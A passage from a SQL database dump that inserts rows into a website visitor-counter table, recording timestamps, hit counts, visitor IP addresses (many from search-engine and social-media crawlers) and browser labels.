'92.118.160.57','other'),(562686,1649611868,1,1,0,0,'92.118.160.9','other'),(562687,1649614865,1,1,0,0,'175.44.42.231','chrome'),(562688,1649616798,1,1,0,0,'207.46.13.103','other'),(562689,1649627864,1,0,1,0,'66.249.70.5',''),(562690,1649628418,1,1,0,0,'157.55.39.19','other'),(562691,1649650500,4,4,0,0,'20.126.98.196','other'),(562692,1649655361,1,1,0,0,'66.249.70.9','chrome'),(562693,1649665172,1,1,0,0,'207.46.13.103','other'),(562694,1649667424,2,2,0,0,'45.82.81.236','chrome'),(562695,1649674701,1,1,0,0,'20.126.98.196','other'),(562696,1649693529,1,1,0,0,'47.91.87.213','firefox'),(562697,1649703485,1,1,0,0,'66.249.70.77','chrome'),(562698,1649706946,1,1,0,0,'92.118.160.13','other'),(562699,1649715433,1,0,1,0,'66.249.70.77',''),(562700,1649721176,1,1,0,0,'92.118.160.17','other'),(562701,1649723143,1,1,0,0,'64.246.165.140','firefox'),(562702,1649728065,1,1,0,0,'66.249.70.7','chrome'),(562703,1649737115,2,2,0,0,'45.82.81.236','chrome'),(562704,1649748441,1,1,0,0,'207.46.13.79','other'),(562705,1649753508,1,1,0,0,'89.14.13.158','firefox');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (562706,1649760655,1,1,0,0,'91.196.178.38','chrome'),(562707,1649775470,1,1,0,0,'13.48.134.174','chrome'),(562708,1649778756,1,1,0,0,'128.14.188.194','chrome'),(562709,1649779671,56,56,0,0,'217.182.15.147','other'),(562710,1649779674,14,14,0,0,'217.182.15.147','chrome'),(562711,1649781484,1,1,0,0,'148.153.117.3','chrome'),(562712,1649787863,1,1,0,0,'103.122.244.192','firefox'),(562713,1649799120,1,0,1,0,'66.249.70.7',''),(562714,1649811363,5,5,0,0,'18.118.20.31','chrome'),(562715,1649823505,2,2,0,0,'45.82.81.240','chrome'),(562716,1649824943,20,20,0,0,'157.230.247.7','chrome'),(562717,1649834500,1,1,0,0,'13.51.146.13','firefox'),(562718,1649854665,1,1,0,0,'194.38.20.161','other'),(562719,1649863169,1,1,0,0,'103.8.238.13','firefox'),(562720,1649864397,1,1,0,0,'31.13.127.12','other'),(562721,1649874211,5,5,0,0,'54.37.160.136','chrome'),(562722,1649881166,1,1,0,0,'66.249.70.5','chrome'),(562723,1649883909,1,0,1,0,'66.249.70.5',''),(562724,1649909919,1,1,0,0,'45.82.81.236','chrome'),(562725,1649909920,1,1,0,0,'45.82.81.236','firefox'),(562726,1649926212,1,1,0,0,'77.11.89.158','firefox'),(562727,1649930470,1,1,0,0,'66.249.70.5','chrome'),(562728,1649948640,1,1,0,0,'66.249.70.5','chrome'),(562729,1649959486,1,1,0,0,'173.252.111.6','other'),(562730,1649959488,1,1,0,0,'173.252.111.9','other'),(562731,1649960549,1,1,0,0,'173.252.111.7','other'),(562732,1649960597,1,1,0,0,'173.252.79.24','other'),(562733,1649963956,1,1,0,0,'157.55.39.19','other'),(562734,1649968559,1,0,1,0,'45.142.122.213',''),(562735,1649969780,1,0,1,0,'66.249.70.5',''),(562736,1649981014,1,1,0,0,'78.47.36.113','other'),(562737,1649981520,57,57,0,0,'125.160.226.207','other'),(562738,1649981543,14,14,0,0,'125.160.226.207','chrome'),(562739,1649996303,2,2,0,0,'45.82.81.225','chrome'),(562740,1650007446,1,1,0,0,'78.47.36.113','other'),(562741,1650019849,1,1,0,0,'157.55.39.122','other'),(562742,1650020911,1,1,0,0,'194.38.20.161','other'),(562743,1650037753,1,1,0,0,'207.46.13.81','other'),(562744,1650043256,1,1,0,0,'173.252.79.15','other'),(562745,1650055193,1,0,1,0,'66.249.70.5',''),(562746,1650055207,2,0,2,0,'66.249.70.7',''),(562747,1650060174,1,0,1,0,'66.249.70.7',''),(562748,1650062926,1,1,0,0,'66.249.70.9','chrome'),(562749,1650067996,20,20,0,0,'178.128.214.132','chrome'),(562750,1650074616,1,1,0,0,'171.225.250.223','chrome'),(562751,1650082716,2,2,0,0,'45.82.81.225','chrome'),(562752,1650095886,1,0,1,0,'66.249.70.7',''),(562753,1650098782,1,1,0,0,'89.14.63.108','firefox'),(562754,1650099950,1,1,0,0,'87.250.224.127','other'),(562755,1650110769,5,5,0,0,'139.59.253.233','chrome'),(562756,1650115093,1,1,0,0,'31.13.127.9','other'),(562757,1650116819,1,1,0,0,'20.83.190.39','chrome'),(562758,1650120342,1,1,0,0,'66.249.70.5','chrome'),(562759,1650127588,1,1,0,0,'207.46.13.212','other'),(562760,1650145281,1,0,1,0,'66.249.70.9',''),(562761,1650153421,1,1,0,0,'66.249.70.7','chrome'),(562762,1650154157,1,1,0,0,'171.255.197.29','other'),(562763,1650156026,1,1,0,0,'171.255.197.30','other'),(562764,1650168056,1,1,0,0,'207.46.13.81','other'),(562765,1650169107,1,1,0,0,'45.82.81.225','msie'),(562766,1650169108,1,1,0,0,'45.82.81.225','other'),(562767,1650169481,1,1,0,0,'5.255.253.186','other'),(562768,1650179948,1,1,0,0,'66.249.89.35','chrome'),(562769,1650181345,1,1,0,0,'128.199.21.138','firefox'),(562770,1650189276,20,20,0,0,'157.230.247.10','chrome'),(562771,1650190181,1,0,1,0,'66.249.70.7',''),(562772,1650204425,1,1,0,0,'207.46.13.81','other'),(562773,1650210052,1,1,0,0,'194.38.20.161','other'),(562774,1650212423,6,6,0,0,'173.208.191.130','chrome'),(562775,1650228868,1,1,0,0,'212.115.42.245','chrome'),(562776,1650231729,1,0,1,0,'66.249.70.5',''),(562777,1650249148,1,1,0,0,'5.255.253.186','other'),(562778,1650255524,1,1,0,0,'45.82.81.238','chrome'),(562779,1650255526,1,1,0,0,'45.82.81.238','firefox'),(562780,1650261880,1,1,0,0,'45.129.18.77','chrome'),(562781,1650262751,1,1,0,0,'165.22.107.85','chrome'),(562782,1650274631,4,4,0,0,'34.213.162.155','firefox'),(562783,1650301914,1,1,0,0,'92.118.36.208','chrome'),(562784,1650319206,1,0,1,0,'66.249.70.9',''),(562785,1650325362,5,5,0,0,'165.227.151.213','chrome'),(562786,1650341912,2,2,0,0,'45.82.81.212','chrome'),(562787,1650344370,1,1,0,0,'93.158.161.48','other'),(562788,1650356729,1,1,0,0,'66.249.70.5','chrome'),(562789,1650357635,1,1,0,0,'77.191.180.60','firefox'),(562790,1650368704,1,0,1,0,'66.249.66.61',''),(562791,1650369974,1,1,0,0,'194.38.20.161','other'),(562792,1650378449,1,1,0,0,'165.22.107.85','chrome'),(562793,1650392517,1,1,0,0,'45.118.145.96','firefox'),(562794,1650394243,1,1,0,0,'114.119.144.233','other'),(562795,1650406501,1,0,1,0,'66.249.66.57',''),(562796,1650407379,1,1,0,0,'31.210.20.124','chrome'),(562797,1650418921,1,1,0,0,'54.170.202.252','chrome'),(562798,1650428341,1,1,0,0,'45.82.81.240','other'),(562799,1650428342,1,1,0,0,'45.82.81.240','chrome'),(562800,1650430582,20,20,0,0,'3.96.141.20','chrome'),(562801,1650432448,1,1,0,0,'207.46.13.212','other'),(562802,1650453023,5,5,0,0,'18.189.16.0','chrome'),(562803,1650455161,1,1,0,0,'54.177.75.254','other'),(562804,1650458627,1,1,0,0,'51.107.89.210','chrome'),(562805,1650464189,5,5,0,0,'208.109.36.200','chrome'),(562806,1650469308,1,1,0,0,'93.158.161.73','other'),(562807,1650469337,1,1,0,0,'77.88.5.207','other'),(562808,1650469339,1,1,0,0,'77.88.5.40','other'),(562809,1650469342,1,1,0,0,'77.88.5.164','other'),(562810,1650469344,2,2,0,0,'93.158.161.48','other'),(562811,1650469347,2,2,0,0,'77.88.5.219','other'),(562812,1650469349,1,1,0,0,'77.88.5.135','chrome'),(562813,1650469352,1,1,0,0,'77.88.5.244','chrome'),(562814,1650474641,1,1,0,0,'114.119.145.233','other'),(562815,1650482624,1,1,0,0,'173.252.111.21','other'),(562816,1650482625,1,1,0,0,'173.252.111.13','other'),(562817,1650491670,1,0,1,0,'66.249.70.5',''),(562818,1650504371,1,1,0,0,'157.55.39.27','other'),(562819,1650514768,1,1,0,0,'45.82.81.220','chrome'),(562820,1650514769,1,1,0,0,'45.82.81.220','other'),(562821,1650531867,1,1,0,0,'66.249.70.9','chrome'),(562822,1650532487,1,1,0,0,'77.183.236.22','firefox'),(562823,1650545882,1,1,0,0,'91.196.178.169','chrome'),(562824,1650546020,1,1,0,0,'194.38.20.161','other'),(562825,1650546828,1,1,0,0,'66.249.70.5','chrome'),(562826,1650577542,1,0,1,0,'66.249.70.7',''),(562827,1650579244,2,2,0,0,'20.212.152.87','chrome'),(562828,1650579252,1,1,0,0,'20.212.152.87','other'),(562829,1650601155,2,2,0,0,'45.82.81.225','chrome'),(562830,1650602792,9,9,0,0,'125.160.237.237','chrome'),(562831,1650603297,1,1,0,0,'125.160.237.237','other'),(562832,1650606397,1,1,0,0,'208.109.190.163','other'),(562833,1650641697,1,1,0,0,'76.72.172.169','firefox'),(562834,1650642153,1,1,0,0,'51.68.141.94','firefox'),(562835,1650650066,1,1,0,0,'173.252.111.8','other'),(562836,1650650067,1,1,0,0,'173.252.111.120','other'),(562837,1650660705,1,1,0,0,'51.15.251.143','other'),(562838,1650662926,1,0,1,0,'66.249.70.5',''),(562839,1650676638,1,1,0,0,'90.156.169.9','firefox'),(562840,1650684097,1,1,0,0,'31.13.103.15','other'),(562841,1650684098,1,1,0,0,'31.13.103.13','other'),(562842,1650684125,1,1,0,0,'31.13.103.5','other'),(562843,1650684126,1,1,0,0,'5.199.232.85','chrome'),(562844,1650684128,1,1,0,0,'31.13.103.9','other'),(562845,1650687534,1,1,0,0,'45.82.81.225','chrome'),(562847,1650688536,1,1,0,0,'51.158.127.119','other'),(562848,1650699114,1,1,0,0,'194.38.20.161','other'),(562849,1650721566,1,1,0,0,'66.249.70.7','chrome'),(562850,1650734207,1,1,0,0,'178.62.77.224','firefox'),(562851,1650747863,1,1,0,0,'34.230.66.160','chrome'),(562852,1650748908,1,0,1,0,'66.249.70.7',''),(562853,1650770491,21,21,0,0,'20.212.87.63','chrome'),(562854,1650773943,2,2,0,0,'45.82.81.212','chrome'),(562855,1650776422,1,1,0,0,'91.196.178.42','chrome'),(562856,1650781155,21,21,0,0,'34.231.110.88','chrome'),(562857,1650791510,21,21,0,0,'20.212.87.63','chrome'),(562858,1650795894,1,1,0,0,'207.46.13.212','other'),(562859,1650801513,21,21,0,0,'20.212.87.63','chrome'),(562860,1650809448,21,21,0,0,'34.231.110.88','chrome'),(562861,1650813628,1,1,0,0,'34.219.252.78','chrome'),(562862,1650819906,21,21,0,0,'20.212.87.63','chrome'),(562863,1650826579,1,1,0,0,'194.38.20.161','other'),(562864,1650830277,1,0,1,0,'66.249.70.5',''),(562865,1650830570,13,13,0,0,'34.231.110.88','chrome'),(562866,1650838019,21,21,0,0,'34.231.110.88','chrome'),(562867,1650843228,1,1,0,0,'207.46.13.160','other'),(562868,1650857509,1,1,0,0,'207.46.13.212','other'),(562869,1650858562,21,21,0,0,'20.212.87.63','chrome'),(562870,1650860344,1,1,0,0,'45.82.81.240','chrome'),(562872,1650862074,21,21,0,0,'34.231.110.88','chrome'),(562873,1650863650,21,21,0,0,'20.212.87.63','chrome'),(562874,1650867936,21,21,0,0,'20.212.87.63','chrome'),(562875,1650868844,21,21,0,0,'20.212.87.63','chrome'),(562876,1650884873,20,20,0,0,'159.223.48.197','chrome'),(562877,1650888966,1,1,0,0,'31.13.127.118','other'),(562878,1650899516,48,48,0,0,'142.54.170.178','other'),(562879,1650899541,11,11,0,0,'142.54.170.178','chrome'),(562880,1650901770,1,1,0,0,'31.13.127.14','other'),(562881,1650901771,1,1,0,0,'31.13.127.117','other'),(562882,1650904098,1,1,0,0,'198.244.206.5','other'),(562883,1650906691,1,1,0,0,'185.237.217.11','chrome'),(562884,1650911574,1,1,0,0,'23.88.45.220','firefox'),(562885,1650914301,21,21,0,0,'20.212.87.63','chrome'),(562886,1650916265,1,0,1,0,'66.249.70.7',''),(562887,1650917311,1,1,0,0,'66.249.70.9','chrome'),(562888,1650933984,1,0,1,0,'66.249.70.9',''),(562889,1650946711,1,1,0,0,'45.82.81.220','other'),(562890,1650946712,1,1,0,0,'45.82.81.220','firefox'),(562891,1650950812,21,21,0,0,'20.212.87.63','chrome'),(562892,1650989822,5,5,0,0,'209.97.169.179','chrome'),(562893,1650996531,1,1,0,0,'109.233.192.83','firefox'),(562894,1651001533,1,0,1,0,'66.249.66.57',''),(562895,1651015419,1,1,0,0,'45.129.18.75','chrome'),(562896,1651026711,1,1,0,0,'91.225.202.38','chrome'),(562897,1651031967,1,1,0,0,'178.128.84.31','chrome'),(562898,1651033126,1,1,0,0,'45.82.81.247','msie'),(562899,1651033127,1,1,0,0,'45.82.81.247','chrome'),(562900,1651048536,1,1,0,0,'66.249.66.57','chrome'),(562901,1651051213,1,0,1,0,'66.249.66.59',''),(562902,1651051339,1,1,0,0,'66.249.66.57','chrome'),(562903,1651052560,1,0,1,0,'66.249.66.59',''),(562904,1651055174,1,1,0,0,'66.249.66.57','chrome'),(562905,1651057985,1,1,0,0,'66.249.66.61','chrome'),(562906,1651058866,1,1,0,0,'66.249.66.57','chrome'),(562907,1651059327,1,1,0,0,'178.128.84.31','chrome'),(562908,1651060396,1,1,0,0,'66.249.66.61','chrome'),(562909,1651063123,1,1,0,0,'66.249.66.59','chrome'),(562910,1651064891,1,0,1,0,'66.249.66.61',''),(562911,1651065580,1,0,1,0,'66.249.66.59',''),(562912,1651066592,2,0,2,0,'66.249.66.59',''),(562913,1651067367,1,0,1,0,'66.249.66.57',''),(562914,1651072870,1,1,0,0,'31.13.127.34','other'),(562915,1651072871,1,1,0,0,'31.13.127.29','other'),(562916,1651075107,1,1,0,0,'194.38.20.161','other'),(562917,1651087987,1,0,1,0,'66.249.66.57',''),(562918,1651094310,1,1,0,0,'66.249.66.57','chrome'),(562919,1651095483,8,8,0,0,'151.106.116.27','chrome'),(562921,1651095484,2,2,0,0,'151.106.116.27','other'),(562924,1651095485,1,1,0,0,'151.106.116.27','firefox'),(562926,1651107220,1,1,0,0,'66.249.66.59','chrome'),(562927,1651112564,48,48,0,0,'178.33.203.41','other'),(562928,1651112573,11,11,0,0,'178.33.203.41','chrome'),(562929,1651119525,1,1,0,0,'45.82.81.238','other'),(562931,1651123769,1,1,0,0,'66.249.66.61','chrome'),(562932,1651164505,1,1,0,0,'107.173.165.214','firefox'),(562933,1651168272,11,11,0,0,'80.87.194.167','chrome'),(562934,1651171206,1,1,0,0,'173.252.111.14','other'),(562935,1651173750,1,1,0,0,'91.196.178.47','chrome'),(562936,1651173968,2,0,2,0,'66.249.66.59',''),(562937,1651203425,1,0,1,0,'66.249.66.59',''),(562938,1651205960,2,2,0,0,'45.82.81.220','chrome'),(562939,1651208190,1,1,0,0,'107.150.46.166','chrome'),(562940,1651220269,11,11,0,0,'80.87.194.167','chrome'),(562941,1651222929,1,1,0,0,'66.249.66.61','chrome'),(562942,1651224250,1,1,0,0,'194.38.20.161','other'),(562943,1651236292,1,1,0,0,'109.239.58.107','chrome'),(562944,1651236762,1,1,0,0,'31.13.127.17','other'),(562945,1651236763,1,1,0,0,'31.13.127.7','other'),(562946,1651240944,1,0,1,0,'66.249.66.57',''),(562947,1651247248,11,11,0,0,'80.87.194.167','chrome'),(562948,1651250875,2,2,0,0,'43.225.189.77','firefox'),(562949,1651252547,1,1,0,0,'91.196.178.43','chrome'),(562950,1651252837,1,1,0,0,'150.95.24.78','firefox'),(562951,1651258906,2,1,1,0,'66.249.66.61',''),(562952,1651265040,1,1,0,0,'173.252.79.15','other'),(562953,1651276730,1,1,0,0,'66.249.66.59','chrome'),(562954,1651281395,1,1,0,0,'185.81.157.70','other'),(562955,1651292307,1,1,0,0,'45.82.81.212','other'),(562956,1651292308,1,1,0,0,'45.82.81.212','chrome'),(562957,1651299503,1,1,0,0,'51.158.109.3','other'),(562958,1651318492,1,0,1,0,'66.249.66.59',''),(562959,1651322505,4,4,0,0,'109.70.108.10','chrome'),(562960,1651331747,6,6,0,0,'185.70.104.84','firefox'),(562961,1651343777,1,0,1,0,'66.249.66.61',''),(562962,1651355661,1,1,0,0,'173.252.107.24','other'),(562963,1651356105,3,3,0,0,'51.142.139.152','chrome'),(562964,1651378700,2,2,0,0,'45.82.81.220','chrome'),(562965,1651401206,14,14,0,0,'159.192.189.204','chrome'),(562966,1651405694,1,1,0,0,'194.38.20.161','other'),(562967,1651412022,5,5,0,0,'44.242.140.208','chrome'),(562968,1651428055,1,1,0,0,'87.250.224.75','other'),(562969,1651430210,1,0,1,0,'66.249.66.61',''),(562970,1651446573,1,1,0,0,'173.201.191.109','chrome'),(562971,1651451661,1,1,0,0,'66.249.66.61','chrome'),(562972,1651455733,1,1,0,0,'66.249.66.59','chrome'),(562973,1651465106,2,2,0,0,'45.82.81.236','other'),(562974,1651470069,20,20,0,0,'209.97.161.23','chrome'),(562975,1651477804,1,1,0,0,'66.249.66.57','chrome'),(562976,1651498923,1,1,0,0,'134.209.173.47','other'),(562977,1651503298,1,1,0,0,'64.246.165.160','firefox'),(562978,1651506479,1,1,0,0,'47.241.26.170','firefox'),(562979,1651514914,1,0,1,0,'66.249.66.57',''),(562980,1651516649,1,1,0,0,'66.249.66.59','chrome'),(562981,1651530910,1,1,0,0,'194.38.20.161','other'),(562982,1651545165,1,1,0,0,'66.249.66.59','chrome'),(562983,1651547479,1,1,0,0,'87.250.224.175','other'),(562984,1651551513,1,1,0,0,'45.82.81.240','chrome'),(562985,1651551514,1,1,0,0,'45.82.81.240','other'),(562986,1651552404,1,1,0,0,'66.249.66.57','chrome'),(562987,1651557859,1,0,1,0,'66.249.66.61',''),(562988,1651564451,1,0,1,0,'66.249.66.59',''),(562989,1651565333,1,1,0,0,'91.196.178.169','chrome'),(562990,1651589469,1,1,0,0,'141.43.203.226','firefox'),(562991,1651596707,5,5,0,0,'208.109.36.200','chrome'),(562992,1651600685,1,0,1,0,'66.249.66.57',''),(562993,1651605899,48,48,0,0,'204.12.234.250','other'),(562994,1651605909,1,1,0,0,'173.252.111.22','other'),(562995,1651605910,1,1,0,0,'173.252.111.20','other'),(562996,1651605913,11,11,0,0,'204.12.234.250','chrome'),(562997,1651616328,1,1,0,0,'213.180.203.67','other'),(562998,1651616535,1,0,1,0,'66.249.66.61',''),(562999,1651616800,1,1,0,0,'66.249.66.61','chrome'),(563000,1651617425,1,1,0,0,'46.133.241.77','chrome'),(563001,1651635016,5,5,0,0,'3.141.35.87','chrome'),(563002,1651637913,1,1,0,0,'45.82.81.236','firefox'),(563004,1651638052,1,1,0,0,'194.38.20.161','other'),(563005,1651647805,2,2,0,0,'20.213.156.164','other'),(563006,1651648078,1,1,0,0,'198.235.24.129','other'),(563007,1651656306,1,1,0,0,'20.203.125.98','other'),(563008,1651657877,1,0,1,0,'66.249.66.61',''),(563009,1651661039,1,1,0,0,'66.249.66.61','chrome'),(563010,1651662148,1,1,0,0,'217.198.191.194','chrome'),(563011,1651671650,1,1,0,0,'207.46.13.55','other'),(563012,1651684073,1,1,0,0,'94.26.245.40','firefox'),(563013,1651686782,1,0,1,0,'66.249.66.61',''),(563014,1651696915,1,1,0,0,'66.249.66.61','chrome'),(563015,1651698991,1,0,1,0,'66.249.66.59',''),(563016,1651710273,1,1,0,0,'66.249.66.59','chrome'),(563017,1651711742,1,1,0,0,'66.249.66.61','chrome'),(563018,1651724010,1,1,0,0,'31.13.103.116','other'),(563019,1651724011,1,1,0,0,'31.13.103.22','other'),(563020,1651724012,1,1,0,0,'31.13.103.2','other'),(563021,1651724307,2,2,0,0,'45.82.81.225','chrome'),(563022,1651728310,1,1,0,0,'207.46.13.55','other'),(563023,1651730697,2,1,1,0,'66.249.66.57',''),(563024,1651744017,1,1,0,0,'40.88.21.235','other'),(563025,1651748485,1,1,0,0,'31.13.127.19','other'),(563026,1651764422,1,1,0,0,'20.91.186.132','other'),(563027,1651771660,1,0,1,0,'66.249.66.57',''),(563028,1651772500,1,1,0,0,'45.129.18.24','chrome'),(563029,1651775302,1,1,0,0,'207.46.13.55','other'),(563030,1651779150,1,1,0,0,'194.38.20.161','other'),(563031,1651810705,2,2,0,0,'45.82.81.247','chrome'),(563032,1651823110,1,1,0,0,'66.249.66.59','chrome'),(563033,1651824156,1,1,0,0,'207.46.13.55','other'),(563034,1651826124,1,0,1,0,'66.249.66.57',''),(563035,1651837703,1,1,0,0,'46.211.26.150','chrome'),(563036,1651861536,1,0,1,0,'66.249.66.61',''),(563037,1651862732,1,1,0,0,'144.91.75.9','firefox'),(563038,1651863907,1,1,0,0,'66.249.66.57','chrome'),(563039,1651863954,1,1,0,0,'66.249.66.59','chrome'),(563040,1651869828,1,0,1,0,'66.249.66.61',''),(563041,1651870981,1,1,0,0,'185.181.60.189','chrome'),(563042,1651874271,1,1,0,0,'173.252.111.117','other'),(563043,1651874279,1,1,0,0,'173.252.107.117','other'),(563044,1651874494,1,1,0,0,'197.52.75.76','other'),(563045,1651876481,1,1,0,0,'3.105.169.193','chrome'),(563046,1651879276,1,1,0,0,'157.55.39.174','other'),(563047,1651887620,1,1,0,0,'66.249.66.61','chrome'),(563048,1651888969,1,1,0,0,'87.250.224.79','other'),(563049,1651895949,1,1,0,0,'5.45.207.154','other'),(563050,1651896687,2,2,0,0,'5.255.253.138','other'),(563051,1651896689,2,2,0,0,'213.180.203.22','other'),(563052,1651896701,1,1,0,0,'87.250.224.50','other'),(563053,1651896702,2,2,0,0,'87.250.224.107','other'),(563054,1651896708,2,2,0,0,'5.45.207.126','other'),(563055,1651896709,2,2,0,0,'87.250.224.19','other'),(563056,1651896711,2,2,0,0,'87.250.224.163','chrome'),(563057,1651896798,2,2,0,0,'5.45.207.111','other'),(563058,1651896858,1,1,0,0,'5.45.207.92','other'),(563059,1651896859,1,1,0,0,'5.255.253.108','other'),(563060,1651897085,1,1,0,0,'141.8.142.77','other'),(563061,1651897103,1,1,0,0,'87.250.224.162','other'),(563062,1651897118,1,1,0,0,'87.250.224.163','other'),(563063,1651897134,2,2,0,0,'141.8.142.67','chrome'),(563064,1651897135,1,1,0,0,'5.255.253.106','other'),(563065,1651897136,1,1,0,0,'5.45.207.154','other'),(563066,1651897137,2,2,0,0,'95.108.213.34','other'),(563068,1651897138,2,2,0,0,'213.180.203.89','other'),(563069,1651897139,1,1,0,0,'5.255.253.115','chrome'),(563070,1651897140,1,1,0,0,'5.255.253.138','chrome'),(563071,1651897145,1,1,0,0,'95.108.213.54','chrome'),(563072,1651897176,1,1,0,0,'5.255.253.166','chrome'),(563073,1651897184,1,1,0,0,'95.108.213.21','other'),(563074,1651897185,1,1,0,0,'87.250.224.85','other'),(563075,1651897186,1,1,0,0,'87.250.224.150','other'),(563077,1651897190,1,1,0,0,'87.250.224.165','other'),(563078,1651897191,1,1,0,0,'5.255.253.183','chrome'),(563080,1651897215,1,1,0,0,'87.250.224.82','other'),(563081,1651897255,1,1,0,0,'87.250.224.165','chrome'),(563082,1651897286,1,1,0,0,'87.250.224.82','chrome'),(563083,1651897305,1,1,0,0,'95.108.213.68','chrome'),(563084,1651900421,1,0,1,0,'66.249.66.57',''),(563085,1651903619,1,1,0,0,'87.250.224.165','other'),(563086,1651907349,1,1,0,0,'213.180.203.22','other'),(563087,1651919836,1,1,0,0,'198.235.24.9','other'),(563088,1651938090,4,4,0,0,'2.58.149.35','chrome'),(563089,1651944132,1,1,0,0,'194.38.20.161','other'),(563090,1651945384,1,1,0,0,'104.45.41.45','firefox'),(563091,1651948231,1,0,1,0,'66.249.66.57',''),(563092,1651953677,1,1,0,0,'198.235.24.34','other'),(563093,1651956716,1,0,1,0,'66.249.66.57',''),(563094,1651956721,1,1,0,0,'66.249.66.59','chrome'),(563095,1651970756,1,0,1,0,'66.249.66.61',''),(563096,1651971473,1,0,1,0,'66.249.66.57',''),(563097,1651973226,1,1,0,0,'66.249.66.57','chrome'),(563098,1651975893,1,1,0,0,'173.252.79.1','other'),(563099,1651982430,1,0,1,0,'66.249.66.59',''),(563100,1651991136,1,1,0,0,'66.249.66.57','chrome'),(563101,1651991846,1,0,1,0,'66.249.66.59',''),(563102,1651994724,1,1,0,0,'66.249.66.61','chrome'),(563103,1652001685,1,1,0,0,'66.249.66.57','chrome'),(563104,1652004207,1,0,1,0,'66.249.66.61',''),(563105,1652007832,1,0,1,0,'66.249.66.57',''),(563106,1652007929,1,0,1,0,'66.249.66.59',''),(563107,1652013263,1,1,0,0,'66.249.66.61','chrome'),(563108,1652017064,2,2,0,0,'147.182.206.55','firefox'),(563109,1652018098,1,1,0,0,'185.237.217.11','chrome'),(563110,1652018498,1,1,0,0,'167.71.96.92','other'),(563111,1652019490,1,1,0,0,'207.46.13.0','other'),(563112,1652019836,2,2,0,0,'91.196.178.52','chrome'),(563113,1652020110,1,1,0,0,'213.180.203.89','chrome'),(563114,1652020272,1,1,0,0,'66.249.66.57','chrome'),(563115,1652024074,1,1,0,0,'167.71.103.36','other'),(563116,1652033010,1,0,1,0,'66.249.66.57',''),(563117,1652036232,1,1,0,0,'141.43.203.226','firefox'),(563118,1652042269,1,1,0,0,'173.252.111.7','other'),(563119,1652074661,1,1,0,0,'194.38.20.161','other'),(563120,1652078721,1,1,0,0,'185.237.217.11','chrome'),(563121,1652081783,2,2,0,0,'66.249.66.59','chrome'),(563122,1652084606,1,0,1,0,'66.249.66.61',''),(563123,1652086131,1,0,1,0,'66.249.66.61',''),(563124,1652087794,1,1,0,0,'66.249.66.61','chrome'),(563125,1652097283,1,1,0,0,'185.237.217.11','chrome'),(563126,1652097285,1,1,0,0,'188.163.114.106','chrome'),(563127,1652098407,1,1,0,0,'188.163.114.106','chrome'),(563128,1652099209,1,1,0,0,'185.237.217.11','chrome'),(563129,1652102294,1,1,0,0,'207.46.13.0','other'),(563130,1652104997,1,1,0,0,'188.163.114.106','chrome'),(563131,1652109051,1,0,1,0,'66.249.66.59',''),(563132,1652118598,1,0,1,0,'66.249.66.59',''),(563133,1652122695,1,1,0,0,'188.163.114.106','chrome'),(563134,1652131200,1,1,0,0,'198.235.24.132','other'),(563135,1652131249,1,0,1,0,'66.249.66.57',''),(563136,1652132548,1,1,0,0,'157.55.39.4','other'),(563137,1652140216,1,1,0,0,'87.250.224.79','other'),(563138,1652141795,1,1,0,0,'66.249.66.61','chrome'),(563139,1652142858,1,1,0,0,'5.255.253.106','other'),(563140,1652148052,1,1,0,0,'212.115.42.243','chrome'),(563141,1652150927,21,21,0,0,'168.63.252.149','chrome'),(563142,1652155746,1,1,0,0,'207.46.13.0','other'),(563143,1652155809,1,1,0,0,'198.235.24.15','other'),(563144,1652159490,1,1,0,0,'91.196.178.44','chrome'),(563145,1652162118,21,21,0,0,'168.63.252.149','chrome'),(563146,1652162195,1,1,0,0,'87.250.224.79','chrome'),(563147,1652165788,1,1,0,0,'13.56.232.170','firefox'),(563148,1652170045,21,21,0,0,'168.63.252.149','chrome'),(563149,1652170332,1,0,1,0,'66.249.66.61',''),(563150,1652170593,1,1,0,0,'66.249.66.57','chrome'),(563151,1652174402,1,0,1,0,'66.249.66.59',''),(563152,1652175933,1,1,0,0,'66.249.66.61','chrome'),(563153,1652177405,21,21,0,0,'168.63.252.149','chrome'),(563154,1652193219,1,0,1,0,'66.249.70.5',''),(563155,1652198718,1,1,0,0,'194.38.20.161','other'),(563156,1652202418,10,10,0,0,'168.63.252.149','chrome'),(563157,1652204239,1,0,1,0,'66.249.70.5',''),(563158,1652204474,1,1,0,0,'173.252.111.8','other'),(563159,1652204848,21,21,0,0,'168.63.252.149','chrome'),(563160,1652208739,1,1,0,0,'192.81.214.91','firefox'),(563161,1652211282,1,1,0,0,'66.249.70.7','chrome'),(563162,1652213375,1,1,0,0,'157.55.39.174','other'),(563163,1652216898,1,1,0,0,'3.127.224.180','chrome'),(563164,1652231030,9,9,0,0,'20.224.16.187','chrome'),(563165,1652236824,8,8,0,0,'168.63.252.149','chrome'),(563166,1652237889,1,1,0,0,'5.255.253.126','other'),(563167,1652240074,1,0,1,0,'66.249.70.7',''),(563168,1652244875,21,21,0,0,'168.63.252.149','chrome'),(563169,1652246071,1,0,1,0,'66.249.70.9',''),(563170,1652247949,2,2,0,0,'168.63.252.149','chrome'),(563171,1652260925,21,21,0,0,'168.63.252.149','chrome'),(563172,1652271056,21,21,0,0,'168.63.252.149','chrome'),(563173,1652281200,1,1,0,0,'141.43.203.226','firefox'),(563174,1652281267,1,0,1,0,'66.249.70.5',''),(563175,1652285064,21,21,0,0,'168.63.252.149','chrome'),(563176,1652286415,1,1,0,0,'51.15.160.148','firefox'),(563177,1652295759,1,0,1,0,'66.249.70.5',''),(563178,1652296499,1,1,0,0,'141.8.142.67','other'),(563179,1652296502,1,1,0,0,'5.255.253.106','chrome'),(563180,1652296526,1,1,0,0,'95.108.213.21','chrome'),(563181,1652296565,1,1,0,0,'5.45.207.103','other'),(563182,1652304676,21,21,0,0,'168.63.252.149','chrome'),(563183,1652307356,2,1,1,0,'66.249.70.7',''),(563184,1652311262,1,1,0,0,'208.109.213.221','other'),(563185,1652311412,1,0,1,0,'66.249.70.7',''),(563186,1652322409,1,1,0,0,'66.249.70.9','chrome'),(563187,1652322531,1,0,1,0,'66.249.70.7',''),(563188,1652329357,1,1,0,0,'194.38.20.161','other'),(563189,1652330695,21,21,0,0,'168.63.252.149','chrome'),(563190,1652334881,5,5,0,0,'20.29.87.131','chrome'),(563191,1652343795,1,1,0,0,'157.55.39.174','other'),(563192,1652344760,21,21,0,0,'168.63.252.149','chrome'),(563193,1652355296,1,1,0,0,'66.249.70.5','chrome'),(563194,1652356502,1,1,0,0,'31.13.127.6','other'),(563195,1652365017,1,1,0,0,'91.196.178.43','chrome'),(563196,1652368144,1,0,1,0,'66.249.70.5',''),(563197,1652368148,1,1,0,0,'66.249.70.5','chrome'),(563198,1652370928,1